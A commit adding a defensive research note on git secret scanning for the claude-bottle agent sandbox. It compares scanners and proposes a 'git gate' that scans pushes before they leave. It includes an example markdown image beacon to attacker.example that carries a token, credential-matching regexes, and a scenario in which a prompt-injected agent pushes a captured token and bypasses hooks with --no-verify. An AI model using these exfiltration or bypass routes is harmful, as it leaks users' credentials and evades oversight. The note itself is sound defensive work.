docs(research): add note on git secret-scanning as defense-in-depth

Threat-models the case where a credential ends up in a tracked
file and is git-pushed to a public remote — the secret is
compromised the instant the push lands (events API, scrapers),
not at merge time. Recommends gitleaks as the smallest-blast-
radius layer to add: Go binary, MIT, offline, scans full history,
hookable from the existing .githooks/.

No code or workflow change; just the research note.
2026-05-12 16:24:06 -04:00
parent 9827b86063
commit 96d2c7b7a1
@@ -0,0 +1,246 @@
# Git secret scanning as further hardening
Research into whether claude-bottle should add a secret-scanning step to
its git workflow — both on the host repo and (potentially) inside
bottles — and what tools exist for it. Motivated by the threat model
below: a secret accidentally `git push`ed to a public remote is
*already compromised* the moment the push hits the wire, well before
anyone clicks "merge."
## Summary
A pre-commit / pre-push secret scanner is a cheap, high-leverage layer
of defense-in-depth that doesn't replace any existing control
(`.gitignore`, environment-variable hygiene, network egress guards) but
catches the one case where everything else fails: a credential ending
up in a tracked file or commit message and being pushed to a public
remote. For claude-bottle specifically, `gitleaks` is the clearest fit
— Go binary, MIT, scans full history including commit messages, runs
fully offline, and integrates with the existing `.githooks/` directory
without adding a new runtime.
## Attack vector: a secret pushed to a public GitHub repo
The naive mental model is "if I notice the leak before the PR is
merged, I can force-push and the secret is gone." That mental model is
wrong in two distinct ways, and both apply *the instant* `git push`
completes — not at merge time.
### 1. The push itself publishes the secret
The moment a commit lands on a public GitHub repo — on any branch, in
any open PR, on any fork — it is publicly fetchable by URL and
broadcast by GitHub's event firehose:
- The commit blob is reachable at `github.com/<owner>/<repo>/commit/<sha>`
and via the raw API. No login or merge required.
- GitHub's public events API streams every push as it happens. The
GH Archive project mirrors that stream and republishes it as hourly
archives, and downstream datasets built on it are refreshed
continuously.
- Independent scrapers (and there are *many*) sit on the events API
watching specifically for commits whose diffs match high-value
credential patterns — AWS keys, GitHub PATs, Stripe keys, OAuth
tokens, OpenAI keys, etc. Empirically, observed time-to-abuse for a
leaked AWS key on a public push is on the order of *seconds to
minutes*. The window in which "I'll just force-push" still works
effectively does not exist.
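- Even after a force-push, the orphaned commit remains reachable by
SHA until GitHub garbage-collects it, which happens on GitHub's
schedule rather than the pusher's, and the SHA itself has already
leaked via the events API. Clones and forks taken in the meantime
keep their copy regardless. Treat any secret that has touched a
public remote as burned: rotate it.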
This is the dominant risk, and on its own it is enough to justify
pre-push secret scanning.
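
To make the scraper behaviour concrete, the sketch below shows the kind of fixed-prefix pattern match involved. It assumes two widely documented token shapes (an AWS access key ID and a classic GitHub PAT); `looks_like_secret` is a hypothetical helper for this note, and real scanners ship far larger rule sets.

```shell
#!/bin/sh
# Illustrative only: two well-known credential shapes. The function name and
# the choice of patterns are assumptions made for this example.
looks_like_secret() {
    # AKIA + 16 uppercase alphanumerics: AWS access key ID
    # ghp_ + 36 alphanumerics:           classic GitHub personal access token
    printf '%s\n' "$1" | grep -Eq \
        -e 'AKIA[0-9A-Z]{16}' \
        -e 'ghp_[A-Za-z0-9]{36}'
}

# AWS's own documentation placeholder key is enough to trip the first pattern.
if looks_like_secret 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE'; then
    echo "match: would be flagged"
fi
```

A match this cheap can run against every public push event, which is why the gap between push and abuse is so short.
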
### 2. Render-time callbacks fire even on un-merged PRs
A separate, sneakier vector: a public PR doesn't have to be *merged*
to cause an outbound request to a server the pusher controls. Opening
the PR is enough. Rendering surfaces along the review path will fetch
remote resources embedded in the diff or in PR metadata:
- **Markdown files in the diff** are rendered with image and link
preview support. An `![](https://attacker.example/pixel.png?token=…)`
in a new README pings the attacker the moment a reviewer (or
GitHub's own renderer warming a cache) views the file. GitHub
proxies most image fetches through `camo.githubusercontent.com`,
which mitigates direct IP capture but *does not stop the fetch
itself* — the attacker still gets the request, and the URL path
can carry exfiltrated bytes.
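- **PR bodies, issue bodies, and comments** all render markdown
with the same image/link semantics. GitHub shows a commit message
itself as plain text with autolinked URLs, but a single-commit PR
takes its default description from that message, so a poisoned
commit message with an embedded image URL can still ping home when
the PR is opened in the web UI, regardless of merge state.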
- **Link unfurls** in PR descriptions, Slack notifications wired to
the repo, and various CI bots all dereference URLs at preview time.
Each is an independent "ping home" opportunity.
- **CI on PR open** runs on the fork's HEAD by default for many
workflow types. Any `curl` in a build step is an exfil channel
before a human ever looks at the PR.
The composite point: by the time a reviewer thinks "hmm, this looks
suspicious, let me close without merging," the bytes that mattered are
already on the attacker's box. Detection has to be at *commit* time
(or *push* time at the latest), not at review time.
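
As an illustration of how visible these callbacks are in the raw text, the sketch below lists every remote image URL in markdown read from stdin. `remote_image_urls` is a hypothetical helper, and the pattern only covers the inline `![alt](url)` form; reference-style images and raw HTML `<img>` tags are out of scope here.

```shell
#!/bin/sh
# Print every remote URL referenced by an inline markdown image on stdin.
# remote_image_urls is a hypothetical helper for this example.
remote_image_urls() {
    # Match "![alt](http(s)://..." up to the closing paren or a space,
    # then strip the "![alt](" prefix so only the URL remains.
    grep -oE '!\[[^]]*]\(https?://[^) ]+' | sed -E 's/^!\[[^]]*]\(//'
}

printf '%s\n' 'Build status: ![](https://attacker.example/pixel.png?token=abc)' \
    | remote_image_urls
```

Piping `git diff --cached` through such a filter would surface the URLs before any renderer fetches them, though it is a triage aid and not a substitute for the scanner.
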
### Why this matters for claude-bottle
Two surfaces are exposed:
1. **The claude-bottle repo itself.** Development happens on a host
with `CLAUDE_BOTTLE_OAUTH_TOKEN`, Gitea tokens, and other
credentials in the environment. A fixture, test snapshot, log
capture, or pasted-in debug output could carry one of them into a
tracked file. The repo's Gitea remote is private, but mirrors or
GitHub forks may not be.
2. **Bottles that push to external remotes.** An agent inside a bottle
that has been granted git push credentials to a public repo is one
prompt-injection away from being induced to commit a captured token
and push it. The egress guard catches *most* exfiltration channels
(`statsig`, `npm`, arbitrary HTTPS), but `git push` to an
allowlisted code host is by design an outbound channel that *works*.
That is the whole point of letting the agent push code. A secret
scanner inside the bottle's git hooks is the only layer that can
intercept content before it leaves on an otherwise-legitimate
channel.
The first surface is the primary one for this note. The second
*looks* harder: anything inside the bottle is by assumption
adversary-controlled, so an in-bottle hook can be bypassed with
`--no-verify`, removed outright, or simply never configured. It
yields, however, to the same trick already used for the OAuth token
and HTTPS inspection: move the check across a kernel-enforced process
boundary that the agent cannot reach.
### Solution for the bottle surface: a git gate
Route bottle-side `git push` through an intermediary git endpoint —
a "git gate" — that runs gitleaks on the incoming objects before
forwarding to the real remote:
- The bottle's git remote is rewritten to point at the gate (e.g.
`git@gate.bottle.local:owner/repo.git`, or an HTTPS endpoint on a
loopback / sidecar address). The agent inside the bottle sees only
the gate URL.
- The gate runs as a separate process / container that the bottle's
unprivileged agent cannot read or modify. It holds the real push
credential (deploy key, PAT, ssh agent socket) — the bottle never
sees it, same as the auth-injecting proxy for `ANTHROPIC_BASE_URL`
in `oauth-token-exposure-to-claude.md`.
- On receive, the gate runs `gitleaks detect` against the incoming
refs (and their message text) in a temporary working tree. Clean
pushes are forwarded to the real remote. Findings cause the push to
be rejected; the agent sees a normal-looking `remote: rejected`
message.
- Network egress out of the bottle is locked to the gate only.
Direct pushes to `github.com`, `gitlab.com`, etc., fail at the
egress layer, so the agent cannot bypass the gate by reconfiguring
the remote URL. The egress guard already in `network-egress-guard.md`
is the load-bearing control here.
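
The receive-side check described above could be sketched as a `pre-receive` hook, assuming the gate keeps a bare repository per upstream and that a gitleaks v8 binary is on its `PATH`. `incoming_range`, `scan_push`, and `GITLEAKS_BIN` are hypothetical names, and forwarding clean pushes to the real remote is deliberately left out.

```shell
#!/bin/sh
# Sketch of a gate-side pre-receive hook. All names here are illustrative.

# Map one "<old> <new>" ref update to the git-log range covering only the
# commits this push introduces. Prints nothing for a ref deletion.
incoming_range() {
    old="$1"
    new="$2"
    case "$new" in
        *[!0]*) ;;           # a real object id: keep going
        *) return 0 ;;       # all zeros: ref deletion, nothing to scan
    esac
    case "$old" in
        *[!0]*) printf '%s..%s\n' "$old" "$new" ;;
        # New ref: scan commits not already reachable from any existing ref.
        *)      printf '%s --not --all\n' "$new" ;;
    esac
}

# Read "<old> <new> <ref>" lines on stdin, as git feeds a pre-receive hook,
# and reject the whole push on the first finding.
scan_push() {
    scanner="${GITLEAKS_BIN:-gitleaks}"
    while read -r old new ref; do
        range="$(incoming_range "$old" "$new")"
        [ -n "$range" ] || continue
        if ! "$scanner" detect --source . --log-opts="$range" --redact </dev/null; then
            echo "rejected: possible secret in $ref" >&2
            return 1
        fi
    done
}

# Only act when installed under the hook name git expects.
case "${0##*/}" in
    pre-receive) scan_push || exit 1 ;;
esac
```

Because git runs `pre-receive` before any ref is updated, a non-zero exit leaves the gate's repository untouched and the client sees the stderr line prefixed with `remote:`.
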
Properties this gives:
- **`--no-verify` does not help the attacker** — the check runs on the
*receiving* side, not in a client hook.
- **Bypass attempts fail closed.** Removing the remote, force-pushing,
pushing to a different host, or shelling out around git all hit the
same egress allowlist.
- **The push credential never enters the bottle.** Compromising the
agent doesn't compromise the credential, only the ability to ask the
gate to push on its behalf — and the gate refuses dirty pushes.
- **Pattern is reusable.** The gate is shape-compatible with the
auth-injecting proxy and with pipelock's TLS interception: a
sidecar that holds the credential, enforces a policy on traffic,
and is unreachable by the unprivileged in-bottle UID.
Open questions deferred to design work, not blockers for this note:
- SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a
per-bottle key the gate authenticates; HTTPS over loopback is
simpler and pairs naturally with pipelock.
- Whether the gate should also enforce repo / branch allowlists per
bottle, or stay narrowly focused on secret scanning. Probably
narrow first, expand later.
- Performance on large pushes. gitleaks on a few-MB diff is sub-second;
on a large monorepo first push it may take seconds. Acceptable.
## Tool landscape (2026)
| Tool | Install | Full history | Commit msgs | Detection | Status | License |
|---|---|---|---|---|---|---|
| **gitleaks** | `brew install gitleaks` | yes (`--log-opts="--all"`) | yes | regex + entropy, ~150 rules | very active (v8.x) | MIT |
| **TruffleHog v3** | `brew`, Docker, GH Action | yes | yes | regex + **live API verification** (700+ types) | very active | AGPL-3.0 |
| **detect-secrets** (Yelp) | `pip install` | working tree + baseline | no | regex + entropy | active, slower cadence | Apache 2.0 |
| **git-secrets** (AWS Labs) | `brew` | yes (`--scan-history`) | yes | regex only, AWS-focused | maintenance mode since ~2021 | Apache 2.0 |
| **ggshield** (GitGuardian) | `pip install` | yes | yes | proprietary ML + regex, optional verified | very active, commercial | MIT CLI, SaaS engine |
Other names that surfaced but do not fit: Semgrep (general SAST, not
git-history-native), `whispers` (Python, low adoption).
Notes on the contenders:
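- **gitleaks** is the de facto open-source standard. The `protect
--staged` mode is purpose-built for pre-commit; the `detect
--log-opts="--all"` mode walks every commit including message text.
No network dependency. Releases from 8.19 onward fold both modes into
`gitleaks git` and keep `detect` / `protect` only as deprecated
aliases, so confirm the spelling against `gitleaks --help` for the
pinned version.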
- **TruffleHog v3** is the strongest one-shot auditor because it can
make live API calls to confirm whether a found credential is still
valid. AGPL is fine for internal use but a consideration if the
detection step gets embedded in a redistributable artifact. Best as
a "run once on history" tool, not as the everyday hook.
- **detect-secrets** is well-loved for its baseline-file workflow (you
declare existing secrets as known and only fail on new ones), but
commit-message scanning is not first-class.
- **git-secrets** is effectively superseded by gitleaks. No reason to
start a new project on it.
- **ggshield** is good if you want a hosted dashboard and incident
management, but it ships repo content to GitGuardian's API by
default — wrong fit for a project whose entire premise is sandbox
isolation.
## Commit message scanning
Several real-world leaks have come from secrets pasted into commit
messages (often by automation that includes captured CLI output in
auto-generated messages). gitleaks, TruffleHog, git-secrets, and
ggshield all scan message text in history mode. detect-secrets does
not — it is content-focused. Anyone using detect-secrets should pair
it with a separate message-scanning step.
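
A staged-content scan runs before the message exists, so catching a secret in the message at commit time needs a `commit-msg` check. The sketch below is one way to do that, assuming a gitleaks v8 CLI that still accepts `detect --no-git`; `scan_message_file` and `GITLEAKS_BIN` are hypothetical names.

```shell
#!/bin/sh
# Sketch of a commit-msg check. scan_message_file and GITLEAKS_BIN are
# hypothetical names; the gitleaks flags assume a v8 CLI that still accepts
# `detect --no-git`.
scan_message_file() {
    msg_file="$1"
    scanner="${GITLEAKS_BIN:-gitleaks}"
    if ! command -v "$scanner" >/dev/null 2>&1; then
        echo "commit-msg: $scanner not found, refusing unscanned message" >&2
        return 1
    fi
    # Copy the message into an empty scratch directory so the scan sees
    # only this one file, then scan that directory as plain files.
    scratch="$(mktemp -d)" || return 1
    cp "$msg_file" "$scratch/COMMIT_MSG" || { rm -rf "$scratch"; return 1; }
    "$scanner" detect --no-git --source "$scratch" --redact
    status=$?
    rm -rf "$scratch"
    return "$status"
}

# Git passes the message file path as $1 when this runs as a commit-msg hook.
case "${0##*/}" in
    commit-msg) scan_message_file "$1" || exit 1 ;;
esac
```

Since the project already has a conventional-commits `commit-msg` hook in `.githooks/`, the function would most likely be called from that existing hook instead of replacing it.
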
## Recommended path forward
In priority order, for the host claude-bottle repo:
1. **One-time retro scan** with gitleaks:
`gitleaks detect --source . --log-opts="--all" --redact`.
Catches anything currently in history including commit messages.
`--redact` masks the matched secret values in the scanner's output,
so the report itself does not become a second leak. Treat any hit as
a credential to rotate, not as a "fix the commit" problem (see the
attack-vector section above for why).
2. **Add a pre-commit hook in `.githooks/`** that runs
`gitleaks protect --staged`. Fits the project's existing pattern
(the conventional-commits `commit-msg` hook lives there), needs no
new runtime, fully offline.
3. **Optional one-time live-verification pass** with TruffleHog:
`trufflehog git file://. --only-verified` (recent releases spell the
filter `--results=verified`). Tells you whether any historically
leaked credential is still active, which is actionable in a way
pattern-matching alone is not.
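
Step 2 above could look roughly like the following hook. It is a sketch, not the project's actual hook: `scan_staged` and `GITLEAKS_BIN` are hypothetical names, and the choice to fail closed when the scanner is missing is an assumption about what the project would want.

```shell
#!/bin/sh
# Sketch of .githooks/pre-commit. scan_staged and GITLEAKS_BIN are
# hypothetical names introduced for this example.
scan_staged() {
    scanner="${GITLEAKS_BIN:-gitleaks}"
    # Fail closed: a missing scanner blocks the commit instead of
    # silently skipping the check.
    if ! command -v "$scanner" >/dev/null 2>&1; then
        echo "pre-commit: $scanner not found, refusing to commit unscanned changes" >&2
        return 1
    fi
    # Scan only what is staged for this commit; mask any matched values.
    "$scanner" protect --staged --redact
}

# Only act when installed under the hook name git expects.
case "${0##*/}" in
    pre-commit) scan_staged || exit 1 ;;
esac
```

Assuming the repo already points `core.hooksPath` at `.githooks/`, saving this as `.githooks/pre-commit` and marking it executable should be enough. `git commit --no-verify` still skips it, which is tolerable on the host surface and is exactly why the bottle surface needs the gate.
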
For the bottle surface, the follow-up is the git-gate design sketched
above: a sidecar git endpoint that bottles push to, that runs
gitleaks on incoming refs before forwarding to the real remote, with
egress locked to the gate so the agent cannot push directly. Tracked
as a future PRD; ordering it after the network egress guard is
correct because the egress allowlist is the control that prevents
bypass and is therefore the prerequisite.
## Sources
- [gitleaks — GitHub repository](https://github.com/gitleaks/gitleaks)
- [TruffleHog — GitHub repository](https://github.com/trufflesecurity/trufflehog)
- [detect-secrets — GitHub repository](https://github.com/Yelp/detect-secrets)
- [git-secrets — AWS Labs GitHub repository](https://github.com/awslabs/git-secrets)
- [GitGuardian ggshield](https://github.com/GitGuardian/ggshield)
- [GH Archive — public GitHub event firehose mirror](https://www.gharchive.org/)
- [GitHub camo image proxy documentation](https://github.com/atmos/camo)
- [Truffle Security — "How fast are leaked secrets abused?"](https://trufflesecurity.com/blog/)